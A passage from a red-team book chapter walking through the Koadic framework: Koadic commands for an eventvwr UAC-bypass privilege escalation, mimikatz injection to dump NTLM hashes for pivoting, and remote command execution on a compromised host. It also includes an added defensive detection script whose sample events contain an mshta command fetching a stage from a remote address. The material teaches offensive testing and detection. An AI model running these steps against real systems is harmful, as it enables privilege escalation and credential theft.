
  • Hands-On Red Team Tactics
  • Himanshu Sharma, Harpreet Singh
  • 2021-08-13 15:36:40

Running Implants

In this case, the bypassuac_eventvwr implant is used to escalate privileges from ring 3 (user-land privileges) to SYSTEM. To use an implant, execute the following command:

use implant/elevate/bypassuac_eventvwr

The prompt now switches from the stager to the implant, and just as we did when configuring the stager, we need to configure the implant before executing it.

We can find the options by executing the following command:

info

This shows two options that must be configured for the implant to execute successfully: PAYLOAD and ZOMBIE. To set the payload, execute the following command:

set payload 0

The question here is, why did we set the payload to 0? To understand this, we need to look at the values shown by the listeners command:

listeners

The listeners command lists all the running stagers. Setting the payload to 0 therefore means the implant will use stager ID 0, that is, the MSHTA stager, to deliver the implant to the zombie for execution.

The implant is now ready to be executed on the target system:

run

When it executes, a new connection with elevated privileges is created as zombie ID 2. Looking at the information for this elevated connection, the asterisk (*) on the user field shows clearly that privileges were escalated; the same marker appears on the ID as well:
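From the defender's side, the two host behaviours this section produces are eventvwr.exe launching something other than its normal mmc.exe child (the bypassuac_eventvwr technique) and mshta.exe pulling a remote document (the MSHTA stager). The following detection script is an added example, not code from the book or from Koadic; the simplified Sysmon-style event format and the sample events (host paths, the 203.0.113.5 address) are constructed for illustration.

```python
"""Detection example for the behaviours described above (added here; not part of
the book or of Koadic). Input is a constructed, simplified process-creation
event: one dict per event with 'image', 'parent' and 'cmdline' fields, which is
the subset of Sysmon Event ID 1 fields the rules below need."""
import re

# Constructed sample events; paths, user and address are made up for the example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\eventvwr.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "eventvwr.exe"},
    {"image": r"C:\Windows\System32\mmc.exe", "parent": r"C:\Windows\System32\eventvwr.exe",
     "cmdline": 'mmc.exe "C:\\Windows\\system32\\eventvwr.msc"'},          # normal child
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\eventvwr.exe",
     "cmdline": "mshta.exe http://203.0.113.5:9999/stage"},                # bypass + stager
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\alice\page.hta"},                      # local .hta, benign here
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the names of all detections that match a single event."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    # eventvwr.exe legitimately launches only mmc.exe; any other child is the
    # eventvwr UAC-bypass pattern (eventvwr.exe running an attacker-chosen command).
    if parent == "eventvwr.exe" and image != "mmc.exe":
        hits.append("uac_bypass_eventvwr_child")
    # mshta.exe fetching a remote URL is how the MSHTA stager delivers the implant.
    if image == "mshta.exe" and URL_RE.search(event["cmdline"]):
        hits.append("mshta_remote_stager")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every event through classify(); return (event index, detection) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in classify(ev)]


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

Only the third sample event fires, on both rules at once; the legitimate mmc.exe child and the locally launched .hta stay quiet.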

We can either use an implant to dump the hashes or use mimikatz. Koadic supports mimikatz by injecting its DLL directly into memory. To use mimikatz, run the following command:

use implant/inject/mimikatz_dynwrapx

You can run it directly without changing any settings:

run

By running the implant, we were able to fetch the NTLM hashes, which can then be used for pivoting.

To execute a command on a zombie, we can use the exec_cmd implant, which is selected with the following command:

use implant/manage/exec_cmd

The CMD option is the command you want to execute. This implant executes the command and saves the result in a file in the %TEMP% directory (as mentioned in the implant settings). We can change the directory, but make sure the chosen directory is writable.

In this case, we will be executing a command to get the list of users on the system by setting cmd to net user:

set cmd "net user"
